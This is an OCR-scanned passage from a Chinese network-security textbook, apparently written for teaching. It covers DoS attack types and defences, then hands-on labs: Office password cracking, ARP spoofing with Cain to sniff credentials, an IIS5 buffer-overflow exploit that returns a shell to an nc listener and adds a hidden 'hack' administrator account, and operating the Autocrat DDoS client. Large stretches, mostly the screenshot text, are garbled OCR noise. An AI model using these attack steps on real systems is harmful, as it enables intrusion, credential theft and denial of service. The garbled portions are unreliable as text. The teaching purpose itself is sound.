泪 滴 攻 击 利用 在 TCP/IP 协议 栈 信任 人 P 碎片 中 的 包 的 标题 头 所 包含 的 信息 来 实现 自己 
的 攻击 。IP 分 段 含有 指示 该 分 段 所 包含 的 是 原 包 的 哪 一 段 的 信息 ， 某 些 TCP/IP 协议 栈 ( 例 
如 NT 在 Service Packet 4 以前) 在 收 到 含有 重合 偏 移 的 伪造 分 段 时 将 崩 演 。 

3. UDP 泛 洪 (UDP Flood) 

如 今 ，Intemet 上 UDP( 用 户 数 据 报 协 议 ) 的 应 用 比较 广泛 ， 很 多 提供 WWW 和 Mail 服 
务 的 设备 通常 是 使 用 UNIX 的 服务 器 ， 它 们 默认 打开 一 些 被 黑客 恶意 利用 的 UDP 服务 。 
如 Echo 服务 会 显示 接收 到 的 每 一 个 数据 包 ， 而 原本 作为 测试 功能 的 Chargen 服务 会 在 收 
到 每 一 个 数据 包 时 随机 反馈 一 些 字符 。UDPFlood 攻击 就 是 利用 这 两 个 简单 的 TCP/IP 服务 
的 漏洞 进行 恶意 攻击 ， 通 过 伪造 与 某 一 主机 的 Chargen 服务 之 间 的 一 次 UDP 连接 ， 回 复 地 
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址 指向 开 着 Echo 服务 的 一 台 主 机 ， 通 过 将 Chargen 和 Echo 服务 互 指 ， 来 回 传送 毫 无 用 处 
且 占 满 带 宽 的 垃圾 数据 ， 在 两 台 主机 之 间 生 成 足够 多 的 无 用 数据 流 。 这 一 拒绝 服务 攻击 可 
飞快 地 导致 网 络 可 用 带宽 耗 尽 。 


4. SYN 泛 洪 (SYN Flood) 


当 用 户 进行 一 次 标准 的 TCP(Transmission Control Protocol， 传 输 控 制 协议 ) 连 接 时 ， 会 
有 一 个 3 次 握手 过 程 。 首 先是 请 求 服务 方 发 送 一 个 SYN(Synchronize Sequence Number， 同 
步 序列 号 ) 消 息 ， 服 务 方 收 到 SYN 后 ， 会 向 请 求 方 回 送 一 个 SYN-ACK 表示 确认 ， 当 请 求 
方 收 到 SYN-ACK 后 ， 再 次 向 服务 方 发 送 一 个 ACK 消息 ， 这 样 一 次 TCP 连接 建立 成 功 。 
SYNFlood 则 专门 针对 TCP 协议 栈 在 两 台 主 机 间 初 始 化 连接 握手 的 过 程 进行 DoS 攻击 ， 其 
在 实现 过 程 中 只 进行 前 2 个 步骤 : 当 服 务 方 收 到 请 求 方 的 SYN-ACK 确认 消息 后 ， 请 求 方 
由 于 采用 源 地 址 欺骗 等 手段 使 得 服务 方 收 不 到 ACK 回应 ， 于 是 服务 方 会 在 一 定时 间 处 于 
等 待 接收 请 求 方 ACK 消息 的 状态 。 而 对 于 某 台 服务 器 来 说 ， 可 用 的 TCP 连接 是 有 限 的 ， 
即 只 有 有 限 的 内 存 缓冲 区 用 于 创建 连接 ， 如 果 这 一 缓冲 区 充满 了 虚假 连接 的 初始 信息 ， 该 
服务 器 就 会 对 接 下 来 的 连接 停止 响应 ， 直 至 缓冲 区 里 的 连接 企图 超时 。 如 果 恶 意 攻击 方 快 
速 连续 地 发 送 此 类 连接 请 求 ， 该 服务 器 可 用 的 TCP 连接 队列 将 很 快 被 阻塞 ， 系 统 可 用 资源 
急剧 减少 ， 网 络 可 用 带宽 迅速 缩小 。 长 此 下 去 ， 除 了 少数 幸运 用 户 的 请 求 可 以 插 在 大 量 虚 
假 请 求 间 得 到 应 答 外 ， 服 务 器 将 无 法 向 用 户 提供 正常 的 合法 服务 。 

5. Land 攻击 (LandAttack) 


在 Land 攻击 中 ， 黑 客 利用 一 个 特别 打造 的 SYN 包 一 一 它 的 原 地 址 和 目标 地 址 都 被 设 
置 成 某 一 个 服务 器 地 址 一 一 进行 攻击 。 此 举 将 导致 接收 服务 器 向 它 自己 的 地 址 发 送 SYN- 
ACK 消息 ， 结 果 这 个 地 址 又 发 回 ACK 消息 并 创建 一 个 空 连接 ， 每 一 个 这 样 的 连接 都 将 保 
留 直到 超时 。 在 Land 攻击 下 ， 许 多 UNIX 将 崩溃 ，NT 变 得 极其 缓慢 (大 约 持续 5 分 钟 )。 

6. IP 欺骗 

这 种 攻击 利用 TCP 协议 栈 的 RST 位 来 实现 ， 使 用 卫 欺骗 ， 迫 使 服务 器 把 合法 用 户 的 
连接 复位 ， 影 响 合法 用 户 的 连接 。 假 设 有 一 个 合法 用 户 (100.100.100.100) 已 经 同 服务 器 建 了 
正常 的 连接 ， 攻 击 者 构造 攻击 的 TCP 数据 ， 伪 装 自己 的 IP 为 100.100.100.100， 并 向 服务 
器 发 送 一 个 带 有 RST 位 的 TCP 数据 段 。 服 务 器 接收 到 这 样 的 数据 后 ， 认 为 从 
100.100.100.100 发 送 的 连接 有 错误 ， 就 会 清空 缓冲 区 中 已 建立 好 的 连接 。 这 时 ， 合 法 用 户 
100.100.100.100 再 发 送 合法 数据 ， 服 务 器 就 已 经 没有 它 的 连接 了 ， 该 用 户 就 被 拒绝 服务 而 
只 能 重新 建立 新 的 连接 。 


3.7.3 ”检测 和 防护 


1. 检测 拒绝 服务 攻击 
在 服务 器 上 可 以 通过 CPU 使 用 率 和 内 存 利用 率 简单 有 效 地 查看 服务 器 当前 负载 情 
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况 ， 如 果 发 现 服务 器 突然 超 负载 运作 ， 性 能 突然 降低 ， 这 就 有 可 能 是 受 攻击 的 征兆 。 不 过 
也 可 能 是 正常 访问 网 站 人 数 增加 而 引起 的 。 按 照 下 面 两 个 原则 即 可 确定 是 否 受到 了 攻击 。 
(1) 网 站 的 数据 流量 突然 超出 平常 的 十 几 倍 甚至 上 百倍 ， 而 且 同时 到 达 网 站 的 数据 包 
分 别 来 自 大 量 不 同 的 下。 
(2) 大 量 到 达 的 数据 包 ( 包 括 TCP 包 和 UDP 包 ) 并 不 是 网 站 服务 连接 的 一 部 分 ， 往 往 指 
向 机 器 任意 的 端口 。 比 如 网 站 是 Web 服务 器 ， 而 数据 包 却 发 向 FTP 端口 或 其 他 任意 的 
端口 。 


2. BAN IP 地 址 法 防护 


确定 自己 受到 攻击 后 ， 就 可 以 使 用 简单 的 屏蔽 IP 的 方法 将 DoS 攻击 化 解 。 对 于 DoS 
攻击 来 说 ， 这 种 方法 非常 有 效 ， 因 为 DoS 往往 来 自 少 量 IP 地 址 ， 而 且 这 些 IP 地 址 都 是 虚 
构 的 、 伪 装 的 。 在 服务 器 或 路 由 器 上 屏蔽 攻击 者 人 后 ， 就 可 以 有 效 地 防范 DoS 的 攻击 。 
不 过 对 于 DDoS 来 说 则 比较 麻烦 ， 需 要 对 IP 地 址 分 析 ， 将 真正 攻击 的 IP 地 址 屏蔽 。 

不 论 是 对 付 DoS 还 是 DDoS， 都 需要 在 服务 器 上 安装 相应 的 防火 墙 ， 然 后 根据 防火 墙 
的 日 志 分 析 来 访 者 的 也， 发 现 访问 量 大 的 异常 IP 段 ， 就 可 以 添加 相应 的 规则 到 防火 墙 中 
实施 过 滤 了 。 

直接 在 服务 器 上 过 滤 会 耗费 服务 器 的 系统 资源 ， 比 较 有 效 的 方法 是 在 服务 器 上 通过 防 
火 墙 日 志 定位 非法 PP 段 ， 然 后 将 过 滤 条 目 添 加 到 路 由 器 上 。 例 如 发 现 进行 DDoS 攻击 的 非 
法 IP 段 为 211.153.0.0， 服 务 器 的 地 址 为 61.153.5.1。 可 以 登录 公司 核心 路 由 器 添加 如 下 语 
句 的 访问 控制 列表 进行 过 滤 : 

access-list 108 deny tcp 211.153.0.0 0.0.255.255 61.135.5.1 0.0.0.0 

这 样 就 实现 了 将 211.153.0.0 的 非法 耳 过 滤 的 目的 。 

3. 增加 SYN 缓存 法 防护 


BAN IP 法 虽然 可 以 有 效 地 防止 DoS 与 DDoS 的 攻击 ， 但 由 于 使 用 了 屏蔽 卫 功能 ， 自 
然 会 误 将 某 些 正常 访问 的 他 也 过 滤 掉 。 所 以 在 遇 到 小 型 攻击 时 ， 不 建议 使 用 BAN IP 法 。 
我 们 可 以 通过 修改 SYN 缓存 的 方法 防御 小 型 DoS 与 DDoS 的 攻击 。 

修改 SYN 缓存 大 小 是 通过 修改 注册 表 的 相关 键 值 完成 的 ， 在 Windows Server 2003 中 
的 修改 方法 如 下 。 

(1) 选择 “开始 ”一 “运行 ”命令 输入 regedit， 进 入 注册 表 编 辑 器 。 

(2) 打开 HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services ， 找 到 
SynAttackProtect 键 值 ， 默 认为 0， 将 其 修改 为 1， 可 更 有 效 地 防御 SYN 攻击 。 

(3) 将 HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services 下 的 Enable 
DeadGWDetect 键 值 修改 为 0。 该 设置 将 禁止 SYN 攻击 服务 器 后 强迫 服务 器 修改 网 关 从 而 
使 服务 暂停 。 

(4) 将 HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services 下 的 Enable PMTUD 
iscovery 键 值 修改 为 0。 这 样 可 以 限定 攻击 者 的 MTU 大 小 ， 降 低 服务 器 总 体 负荷 。 

(5) 将 HREY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services 下 的 KeepAlive 
Time 设置 为 300 000， 将 NoNameReleaseOnDemand 设置 为 1。 
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在 Windows 2000 下 拒绝 访问 攻击 的 防范 方法 和 Windows Server 2003 基本 相似 ， 只 是 
在 设置 数值 上 有 些 区 别 。 简 单 介 绍 如 下 。 


将 SynAttackProtect 设置 为 2。 

将 EnableDeadGWDetect 设置 为 0。 

将 EnablePMTUDiscovery 设置 为 0。 

将 KeepAliveTime 设置 为 300 000。 

将 NoNameReleaseOnDemand 设置 为 1。 


3.8 小 型 案例 实 训 


3.8.1 ”Office 密码 破解 


Office 办 公 软 件 是 人 们 最 常用 的 软件 之 一 ， 用 密码 来 保证 文件 内 容 的 机 密 性 也 是 常用 
的 方法 。 但 是 遗忘 密码 的 事情 发 生得 非常 多 ， 以 至 于 有 很 多 人 怕 忘 记 而 不 敢 设 密码 。 实 际 
上 ， 忘 记 密码 是 可 以 恢复 的 。 通 常 使 用 的 是 由 ElcomSoft 公司 出 品 的 Advanced Office 
Password Recovery 来 恢复 Microsoft Office 软件 密码 。 

ElcomSoft 是 俄罗斯 著名 的 计算 机 软件 公司 ， 是 计算 机 安全 和 数据 恢复 应 用 领域 的 专 
家 级 公司 。 他 们 出 品 了 很 多 受 欢迎 的 软件 ， 包 括 电子 书 处 理 和 密码 恢复 软件 ， 并 且 支 持 微 
软 的 许多 产品 。 

本 软件 可 以 恢复 的 文件 种 类 很 多 ， 几 乎 Office 的 所 有 文件 类 型 都 可 以 使 用 本 软件 进行 
恢复 。 主 要 格式 如 下 : 


Microsoft Word 文档 。 

Microsoft Excel 文档 。 

Microsoft Access 数据 库 。 
Microsoft Outlook 个 人 存储 文件 。 
Microsoft Outlook VBA 宏文 件 。 
Microsoft Money 数据 库 。 
Microsoft Schedule+ 文 件 。 
Microsoft Backup 文件 。 
Microsoft Mail 文件 。 

Visio 文件 。 

Microsoft PowerPoint 演示 文稿 。 
Microsoft Project 文件 。 
Microsoft Pocket Excel 文件 。 
Microsoft OneNote 文件 。 


下 载 Advanced Office Password Recovery( 以 下 缩写 为 AOPR)， 解 压 文件 包 到 指定 目 
录 。 双 击 其 中 的 安装 程序 ， 根 据 向 导 提示 进行 安装 即 可 。 


1. 破解 设置 
为 了 缩短 AOPR 破解 文档 密码 的 时 间 ， 使 用 之 前 应 该 估计 一 下 密码 的 构成 特点 ， 然 后 
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合理 选择 将 要 使 用 的 破解 策略 。 假 如 密码 可 能 由 英文 单词 、 人 名 构成 ， 最 好 优先 选用 “ 字 
典 ” 方 式 进行 破解 。 如 果 由 字母 、 数 字 等 随机 构成 ， 选 用 “暴力 ”方式 具有 更 快 的 速度 。 
破解 策略 的 设置 方法 是 : 打开 AOPR 窗口 中 的 “恢复 ”选项 卡 ， 选 中 “针对 强加 密 文 档 
破解 类 型 ”下 的 3 个 选项 之 一 。 

(1) 暴力 破解 。 如 果 密 码 由 字母 、 数 字 等 随机 构成 ， 就 应 该 选中 “暴力 破解 ”， 如 
图 3-29 所 示 。 暴 力 破解 是 对 所 有 字符 (英文 字母 、 数 字 和 符号 等 ) 的 组 合 依次 进行 尝试 的 一 
种 破解 方法 。 可 能 的 组 合 数 越 多 ， 破 解 的 时 间 越 长 ， 而 组 合 数 的 多 少 ， 与 密码 的 长 度 和 密 
码 使 用 的 字符 集 直接 相关 。 因 此 ， 为 了 减少 可 能 的 组 合 数 ， 在 破解 前 应 该 估计 一 下 密码 的 
构成 特点 ， 然 后 打开 “暴力 ”选项 卡 ， 如 图 3-30 所 示 ， 在 “密码 长 度 ” 栏 选择 密码 的 最 小 
和 最 大 长 度 ， 把 已 知 或 估计 的 密码 长 度 包括 进去 即 可 ;如 果 密 码 是 由 小 写 英文 字母 和 数字 
构成 ， 就 要 选中 “字符 集 ” 栏 的 a-z 复 选 框 和 0-9 复 选 框 ， 否 则 应 当 按 构成 密码 的 字符 集 
选中 相应 的 选项 。 
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恢 呈 “最 力 字 山寺 页 [系统 六 息 [ 宣 码 委 人 | 
守 对 强加 宅 文 性 8 破 解 类 型 
加 虹 力 及 及 ( 当 这 所 有 可 能 98 语 ) 
搞 码 式 暴 力 破解 ( 若 已 其 知 部 分 密 码 符号 》 
字 玫 下 角 (推荐 ) 
但 铺 : 

















日 窗口 
日 期 , 时 间 要件 
® ifio/s is3A ApR $03Professona Edoon 已 加 地 
贸 2013/10/18 12:53:42 。。 此 操作 系统 版 三， Windows 7 [6.1.7501] Service Pack 1 
YY 1308 ts342 pu: 4, Miia CuOA: 0, ATL CNL: 1 





当前 密码 : 当前 违 度 : 
进度 指示 器 0% 
供 家 语 及 商业 用 户 的 授权 (单机 ) 
Advanced Office Password Recovery Professional Editon, 版 本 5.03. Copyright?1999-2010 ElcomSoft Co, tt 





3-29 选择 破解 方式 


隐 Advanced Office Password Recovery Professional Editior 
文件 你 复 因特网 VBA 后 门 王 言 帮助 
打开 文件 … M5 通行 证 ”M5 outbok 。 vBA 后门 


[临夏 | 好 和 宰 身 | 选 而 系统 信 息 | 二 而 各 丰 











3 
YY 13/10/18 13:39:39 
当前 密码 : boq 














供 衣 庭 及 亢 业 用 产 的 接 权 (单机 ) 
Advanced Office Password Recovery Professional Edition, 版 本 503. Copyright ?1999-2010 ElcomSoft Co. tt 








图 3-30 ”暴力 破解 设置 


[79N. 
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一 旦 破解 失败 ， 就 要 回 到 “暴力 ”选项 卡 中 修改 原来 的 破解 设置 ， 例 如 增加 密码 的 最 
小 和 最 大 长 度 的 范围 ， 同 时 选中 A-Z 等 更 多 种 类 的 字符 集 。 

(2) 掩 码 式 暴力 破解 。 如 果 知道 密码 中 的 若干 字符 ， 建 议 选 中 “ 掩 码 式 暴力 破解 ”， 
如 图 3-31 所 示 。 使 用 掩 码 式 暴力 破解 比 使 用 纯粹 的 暴力 破解 更 节约 时 间 。 使 用 这 种 破解 方 
法 时 ， 要 打开 “暴力 ”选项 卡 ， 在 “ 掩 码 / 掩 码 字 符 ” 文 本 框 中 输入 密码 包含 的 字符 ; 另 
外 ， 为 了 尽量 减少 尝试 的 组 合 数 ， 仍 然 要 设置 密码 的 长 度 和 密码 中 其 他 字符 所 在 的 字符 
集 ， 如 图 3-32 所 示 。 


| 六 性 恢复 司 和 癌 VBA 后门 语言 莉 助 





-| @ 3 ® 很 忆 
打开 文件 .… Ms 通行 证 Ms Outock 。 vaA 后 站 下 全 上 
你 页 | 暴力 | 字 奥 | 选 硕 | 系统 信息 | 密码 委 存 
守 双 0 证 文 8 和 角 天 型 








) 蜡 力 破解 《 安 试 所 有 可 能 的 组 合 | 
加 搞 码 式 暴力 丰 解 《车 已 图 入 部 分 密码 符号 ) 
) 字 购 大凡 《推荐 ) 


文件 名 种: 


日 去 窗口 
日 时 本 事件 
DD aon 125342 AOPRS.03 Professonal Ebon 已 
SY 2013/10/B 12534 2 此 操作 条 统 版 本 : Windows 7 [6.17601] Serwce Pacd 1 
YY mtarons 125342 pu: 4 Na CuDA:O,ATICAL 1 








当前 速度 : 






当前 密码 : 
过 度 指示 器 oO% 
及 交 业 用 户 的 组 肥 ( 音 矶 ) 
Advanced Office Password Recovery Professional Edition, 版 503. Copyright 71999-2010 ElcomSoft Co. Ltd 


图 3-31 选择 破解 方式 





文件 人 得 因 生 网 VBA 后 ] 王 识 半 抱 


二 -| @ SS % 般 钥 








条 天 文件 … 了 贴 通行 正 ”NS Outook 。 WBA 后 门 于 赂 信 止 

EL ES 

密码 长 度 : 字符 集 : 赵 的 击 玛 : 

最 小 最 大 az 司 0-9 

3 图 BB -2 国 !@.- i 
四 所 nz 回 空格 A 
可 自 设 字符 集 

上 日志 窗口 

日 期， a 于 

可 o/s do 已 加 载 

et ee re -7601] Service Pack 1 

Y x013/0/18125342 pu: 4, NWida Cup 0, ATICAL: 























当 间 密码: 当前 过度: 
进度 指示 器 0% 
供 家 厅 及 商业 用 户 的 委 各 ( 音 机 ) 
Advanced Office Password Recovery Professional Edition, 搬 本 5.03. Copyright ?1599-2010 ElcomSoft Co. Ltd 


图 3-32 掩 码 暴力 破解 设置 


(3) 字典 破解 。 如 果 密 码 可 能 由 英文 单词 、 人 名 等 构成 ， 就 应 该 选中 “字典 破解 ”。 
AOPR 只 带 了 一 个 密码 字典 文件 ， 该 字典 文件 在 预备 破解 时 已 经 使 用 。 因 此 ， 要 进行 字典 
破解 ， 需 要 选择 其 他 密码 字典 文件 。 在 “字典 ”选项 卡 ， 如 图 3-33 示 ， 单 击 “ 获 取 字 典 ” 
按钮 ， 在 打开 的 AOPR 官方 网 站 可 以 邮购 密码 字典 光盘 。 另 外 ， 字 典 文件 也 可 以 由 专业 的 
字典 工具 生成 。 


.ao 
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AOPR 自 带 的 密码 字典 路 径 为 Password Recovery\Common Files\Dic\english.udic， 可 以 
使 用 记事 本 打开 查看 ， 如 图 3-34 所 示 。 





全 -| @ 3 多 


打开 文件 、 M5 通行 正 。 MS Outook 。 VBA 后 门 




















屋 夏 | 晤 力 字典 | 选 页 系统 计 息 | 密 泣 绎 存 
字典 文件 ; 


Frprooran Ps Goo) Worerd off password Tm 
默认 字典 ; 


ciprogran Fles Pad) Wavareed offes Passnord 














遇 i 


日 志 窗口 

日 期 时间 

13110118 12:53: 
213110118 12:53:42 

213/0/18 12:53:42 
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图 3-33 ”字典 破解 设置 图 3-34 字典 


如 果 对 密码 的 构成 情况 一 无 所 知 ， 就 应 当 打 开 “ 选 项 ”选项 卡 ， 将 “预备 暴力 破解 ” 
“预备 字典 破解 ”和 “密码 缓存 预备 破解 ”全 部 选中 。 
2. 破解 密码 


破解 密码 的 操作 非常 简单 ， 单 击 “ 打 开 文件 ”按钮 ， 打 开 对 话 框 ， 在 “文件 类 型 ”下 
拉 列 表 中 选择 “所 有 支持 的 文件 类 型 ”( 或 要 破解 的 文件 类 型 )， 然 后 找到 并 选中 待 破解 文 


件 ， 在 此 选择 的 是 Word 文件 。 单 击 “ 开 始 ”按钮 ， 开 始 破解 密码 ， 主 界面 窗口 下 方 的 进 
度 指 示 器 会 显示 当前 的 破解 进度 ， 如 图 3-35 所 示 。 


文件 恢复 因 符 网 VBA 后 门 滞 言 帮助 


@ SS % 屏 届 


打开 文件 号 通行 正 。 MS Outook WE 


太刀 | | 通 ] 系 坊 信息 密码 组 存 | 








日 志 窗 品 
日 期 , 时 间 事件 
图 13/10/18 13:44:0 


R2013/10/18 13:4431 用 户 和 目 恢 夏 处理 
二 2013/10/18 13:4436 国 | 
2013/10/18 13:4#37 Internal: esprPasswordBruteForce0 ee 











当前 宝 码 :ajaq 当前 速度 : 42991 宣 码 / 秒 
密码 长 度 =4 0% [a 
供 家 话 及 高 业 用 户 的 授权 (单机 ) 
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一 旦 AOPR 找到 了 正确 的 文档 密码 ， 就 会 弹出 “Word 密码 已 被 恢复 ”对 话 框 ， 如 
图 3-36 所 示 单 击 “Word 文件 打开 密码 ” 右 端 的 按钮 ， 就 可 以 把 破解 得 到 的 密码 复制 到 前 
贴 板 。 单 击 “ 打 开 ” 按 钮 ， 打 开 文 档 的 “密码 ”对 话 框 ， 按 CtrltV 组 合 键 将 密码 粘贴 到 里 
面 ， 就 可 以 用 破解 得 到 的 密码 打开 文档 了 。 


Ward 文件 打开 密码 : 
Ward 写 保护 宇 码 : 
Word 文档 保护 密码 : 
Word VBA 密码 : 


抽 向 向 昌 
Viv 


文件 路 径 : 
CisersWdminstrator Desktop\《 加 密 与 解密 案例 教程 目录 ，| “网 打开 .… 


选 定 文件 的 所 有 密码 均 已 成 功 恢复 或 被 更 改 ! 








3-36 ”破解 成 功 
【使 用 技巧 】 


在 AOPR 中 ,设置 好 破解 方式 和 设置 ， 然 后 加 载 要 破解 的 文档 进行 破解 ， 有 时 会 出 现 
没有 按照 设置 进行 破解 的 情况 。 此 时 ， 单 击 “ 停 止 ”按钮 中 断 现 有 破解 过 程 ， 再 单 击 “ 开 
始 ” 按 钮 重新 开始 破解 ， 可 以 解决 上 述 问题 。 

【知识 应 用 】 


即使 使 用 同一 个 密码 加 密 ， 为 什么 Offce 2007( 或 Offce 2010) 比 Office 2003 更 难 破解 ? 

传统 的 Word 和 Excel 使 用 的 是 40 位 RC4 加 密 算法 ， 但 是 随 着 更 快速 计算 机 的 出 现 ， 
这 种 加 密 法 已 经 变 弱 了 。 在 Office 2007 中 引入 的 Open XML 格式 (.docx、.xlsx、.pptx) 使 得 
微软 完善 了 文件 加 密 机 制 的 算法 ，Office Open XML 格式 使 用 的 是 128 位 AES 加 密 。 不 过 
在 Office 97~~2003 中 进行 双重 格式 保存 时 ， 仍 然 在 使 用 RC4。 


3.8.2 Cain 实现 ARP 欺骗 


ARP 欺骗 的 原理 是 操纵 两 台 主 机 的 ARP 缓存 表 ， 以 改变 它们 之 间 的 正常 通信 方向 ， 
这 种 通信 注入 的 结果 就 是 ARP 欺骗 攻击 。ARP 欺骗 和 嗅 探 是 Cain 用 得 最 多 的 功能 了 ， 在 
Cain 的 主 界面 切换 到 “ 嗅 探 ”标签 。 单 击 网 卡 的 那个 标志 开始 嗅 探 ， 旁 边 的 放射 性 标志 则 
是 ARP 欺骗 。 

欺骗 的 目标 是 172.202.10.253， 欺 骗 方 式 为 充当 目标 机 和 网 关 的 中 间 人 ， 如 图 3-37 所 示 。 

在 目标 机 172.202.10.253 上 查看 ARP 缓存 表 ， 欺 骗 前 如 图 3-38 所 示 ， 欺 骗 后 如 图 3-39 
所 示 ， 网 关 的 MAC 地 址 发 生 了 改变 ， 变 为 欺骗 机 器 的 MAC 地 址 。 

在 欺骗 的 过 程 中 ， 能 够 看 到 被 欺骗 机 器 的 所 有 上 网 操作 ， 包 括 明文 传递 的 账号 和 密 
码 ， 如 图 3-40 所 示 。 
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New ARP Poison Routing 


WARNING Wm 


enables you IO Mick IP balfic belween the selected host on the lef bat and al selected osts on the ngpt lst r both 
drecbons I a selected host her rouhng capabiites WAN bafhc wll be riescepted ss wel Please nole tha smce your 

are hes no th seme pomanc® of 2 roe you could cone Dos 1 yod set APR Detween yo Delal Eaemay and 
other hosts on yous LAN. 











| 
| [pades: [mac ] Hostname 
| 
| 





- 二 EE 

rT 和 

| 1722021011 BSAEED277785 FeE903C89350 

才 生 全 和 2 所 

| 1722021013 BSAEED277GAE 000C2995F408 

1722021014 BOAEED277A2® 000C2S63AAE8 

es Ee 

| | ee oo 

1722021017 BSAEED277A20 BSAEED22FAAE 

EB。 | ES 

|1722021022 BBAEED27731 = B8AEED20F7SD > 
证 


2 .19 124 Gx18603 
P| al A 
74-99-9b ?2.2 254 b8-ae-ed-2 





3-38 ”欺骗 前 ARP 表 3-39 欺骗 后 ARP 表 


Pi Canfieae Tecks by 
忆 册 罗网 中 嗣 十 避 是 名 台 I 本 加 BS O? 下 
nr | er rr [rm [mr re | re | 


Pumerd EE 
1 T/T 
0 MTP 
1395816205340727 124 207 34 多 pe eeeobiewr /festeres /yl joy 
hyY303EatTOZake sxTMCc 后 
1395916263307633 124 207 3 多 eon /oebseer /fostwres/yml. jsp 
WTPATMewedr. 9RJEDOMATBY 
0 0 














om a 
1395816302515497 124 .3207.34.98 


isosingi Sa 
op SILTRN YadCnlT. WOTIOBET 
Sr OO) 1414032402000 [seh | 


1305816341192639 124 207.34 9 
六 因 0000373 
WU/NC O) bt 124 9 放 二 











A Pussrords 


st packets 





图 3-40 ARP 欺骗 
3.8.3 ”缓冲 区 溢出 攻击 
本 节 通 过 IIS 的 pinter 缓冲 区 溢出 攻击 的 实例 ， 理 解 缓冲 区 攻击 的 原理 和 攻击 方法 。 
用 到 的 软件 为 IS5Exploit.exe、NC.exe， 被 攻击 的 主机 安装 英文 版 IIS 5.0。 
。 开放 监听 端口 
在 命令 提示 符 窗口 运行 nc -1-p 5555 命令 ， 其 中 5555 为 监听 端口 ， 可 以 自己 设 定 。 
2. 使 用 IIS5Exploit 进行 攻击 


新 打开 一 个 命令 提示 符 窗口 ， 运 行 IS5Exploit 192.168.3.10 192.168.3.200 5555 命令 ， 
其 中 192.168.3.10 为 要 攻击 的 目标 主机 IP 地 址 ，192.168.3.200 为 本 机 IP 地 址 ，5555 为 监 


.sa 


TY @ 


听 端 口 ， 与 之 前 开放 的 监听 端口 一 致 。 


执行 成 功 后 ， 在 监听 窗口 中 会 出 现 如 图 3-41 所 示 信息 。 


Hicrosoft Windows 2888[Version 5.88.2195] 
(CY Copyright 1985-1999 Microsoft Corp. 


3-41 ”IIS5Exploit 执行 成 功 后 








在 监听 窗口 中 输入 net user hack 123/add 命令 ， 按 Enter 键 。 然 后 再 输入 net localgroup 


administrartors hack /add 命令 ， 这 样 就 在 目标 计算 机 上 创建 了 一 个 属于 Administrators 组 的 
用 户 hack， 密 码 为 123。 


3.8.4 拒绝 服务 攻击 


本 节 用 到 的 软件 为 Autocrat， 被 攻击 的 计算 机 上 安装 Autocrat 软件 的 服务 器 端 程序 。 

1. 添加 主机 

打开 Autocrat 软件 的 客户 端 ， 单 击 “添加 ”按钮 ， 输 入 对 方 耳 即 可 。 

2. 检查 Server 状态 

发 动 攻击 前 ， 为 保证 Server 的 有 效 ， 对 它 来 次 握手 应 答 过 程 ， 把 没 用 的 Server 踢 出 


。 单 击 “ 检 查 状 态 ” 按 钮 ，Client 会 对 人 P 列表 扫描 检查 ， 最 后 会 生成 一 个 报告 ， 如 图 3-42 


所 示 。 


3. 清理 无 效 主机 
单 击 “ 切 换 ” 按 钮 ， 进 入 无 效 主机 列表 。 单 击 “ 清 理 主机 ”按钮 ， 把 无 效 的 废 机 踢 出 


去 。 再 单 击 “ 切 换 ” 按 钮 转 回 主机 列表 ， 如 图 3-43 所 示 。 


4. 检查 文件 
攻击 时 要 用 到 wsock32.dll、1.dll、p.dll 这 三 个 DLL 文件 。 单 击 “ 检 查 文件 ”按钮 查看 


文件 状态 ， 如 果 发 现 文件 没 了 ， 可 以 用 extract 命令 释放 文件 ， 如 图 3-44 所 示 。 


184. 








明 Autocrat DDoS Client se Hy y 


09 十 7 及 册 天 toperat- 和 天 无 协力 制作 
型 Ey 
J 





0 Beir ED 


| 5 | | 检查 文件 | | 信人 各 | | 开 用 了 去 | 打上 





| 
E37EEE 


FI 中 


LE .2 pal 











图 3-42 检查 Server 端 状态 3-43 ”清理 无 效 主机 
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5. 攻击 


经 过 前 面 的 准备 ， 单 击 “ 开 始 攻 击 ” 按 钮 ， 可 以 发 动 攻 击 了 ， 如 图 3-45 所 示 。 单 击 停 
止 攻击 按钮 可 以 停止 攻击 。 


级 Autocrat DDoS Client Ey y 


生计 二 ma、 鸯 天 Seoerss 半天 信访 人 -ALL cjeg0Tecsmaiast-e 


主机 家 一 

共有 6 Mn [加] | 
| 

2 

2 


0 
20 WE 0 | 和 本 
es 


一 
控制 所 有 主机 ， 加 果 需 要 单 次 控制 请 用 手工 全 人 或 http-/119 :855 


I 加 时 大 要 音 攻 榨 制 ,请 用 手工 命令 或 http //ip-8535 


| 生理 老夫 机 文件 “| 全 便服 务 || 开始 下 市] | 停止 下 本 
[| 
-ja 本 


E27 


巷 要 居 坟 | | 检查 文件 | | 信 售 照 务 | 开始 攻击 | | 售 目 下 击 | 


| RS [| 
| F109 [ 国 习 




















图 3-44 检查 文件 图 3-45 攻击 


SYN 攻击 : 源 可 以 随便 输入 ， 目 标 IP 填 你 要 攻击 的 人 P 或 域名 ， 源 端口 选择 你 要 攻击 
的 一 个 ， 目 标 端口 ;80 为 攻击 HTTP，21 为 攻击 FTP，23 为 攻击 Telnet，25/110 为 攻击 
E-mail。 

LAND 攻击 : 填 目 标 卫 和 目标 端口 即 可 ( 同 SYN)。 

FakePing 攻击 : 源 IP 随便 填 ， 目 标 IP 填 你 要 攻击 的 卫 ， 接 下 来 就 会 有 大 量 ICMP 数 
据 阻塞 他 的 网 络 。 

狂怒 之 Ping 攻击 : 直接 填 目 标 卫 即 可 ， 原 理 同 FakePing。 


本 章 小 结 
本 章 对 计算 机 常见 的 攻击 方法 进行 了 讲解 ， 介 绍 了 网 络 攻 击 的 一 般 步骤 ， 重 点 讲述 了 


端口 扫描 、 口 令 攻击 、 网 络 监听 、ARP 欺骗 、 缓 冲 区 溢出 、 拒 绝 式 服务 攻击 的 原理 及 方 
法 ， 介 绍 了 相关 工具 的 使 用 、 实 施 的 步骤 及 效果 。 


习 题 
一 、 选 择 题 
1. 攻击 者 用 传输 数据 来 冲击 网 络 接口 ， 使 服务 器 过 于 繁忙 以 至 于 不 能 应 答 请 求 的 攻 
击 方式 是 ( )。 
A. 拒绝 服务 攻击 B. 地 址 欺骗 攻击 
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C. 会 话 动 持 D. 信号 包 探测 程序 攻击 
2. HTTP 默认 端口 号 为 (。 )。 
大 2 B. 80 C. 8080 D. 23 


3. ”网 络 监听 是 ( 局 
A. 远程 观察 一 个 用 户 的 计算 机 B. 监视 网 络 的 状态 、 传 输 的 数据 流 
